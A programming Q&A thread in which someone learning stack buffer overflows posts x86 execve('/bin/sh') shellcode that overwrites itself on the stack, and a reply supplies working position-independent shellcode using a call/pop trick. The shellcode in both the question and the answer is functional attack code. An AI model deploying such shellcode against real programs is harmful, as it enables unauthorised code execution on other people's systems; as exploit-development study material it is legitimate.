Accidentally overwriting my own instructions during buffer overflow

Question

I am trying to learn how to do a basic buffer overflow attack. I have working assembly and correct shellcode (no null bytes or references to other data). The assembly is as follows:

;clear out registers
xor eax, eax
xor ebx, ebx
xor ecx, ecx
xor edx, edx
;execve("//bin/sh",NULL,NULL)
mov al, 11
;ascii for //bin/sh
;2f 2f 62 69 6e 2f 73 68
; push null bytes on to stack
push bx
push 0x68732f6e
push 0x69622f2f
;set ebx to //bin/sh
mov ebx, esp
;call execve
int 0x80

When I run the assembly by itself, it works fine. and when I construct the shell code from it, using a nop sled and the correct address, I a able to overwrite eip and get it to start executing my assembly.

The problem is that, since my instructions are stored on the stack ( in a 64 byte buffer) the second push instruction overwrites the final instruction in my code. So int 0x80 is never executed because it is replaced with 2f2f. Can anyone tell me how I might work around or fix that problem?

Answer 1

Try with relocatable code and data. This last thing is acomplished by figuring out what address our code is in, like this:

         call next    ;push address of next instruction to stack.
         nop          ;this is to avoid offset in CALL instruction to be 0.
next:    pop ebx      ;EBX holds this very same code address
         xor ecx,ecx
         mov cl,exename-next   ;ECX is offset to exename
         add ebx,ecx  ;now EBX points to exename
         xor eax,eax
         xor ecx,ecx
         xor edx,edx
         mov al,11
         int 80h
exename: db "/bin/sh",0

The CALL instruction is a CALL NEAR one actually, so it uses an offset, not an absolute address and hence, is relocatable. This code uses only 4 bytes of stack instead of 12.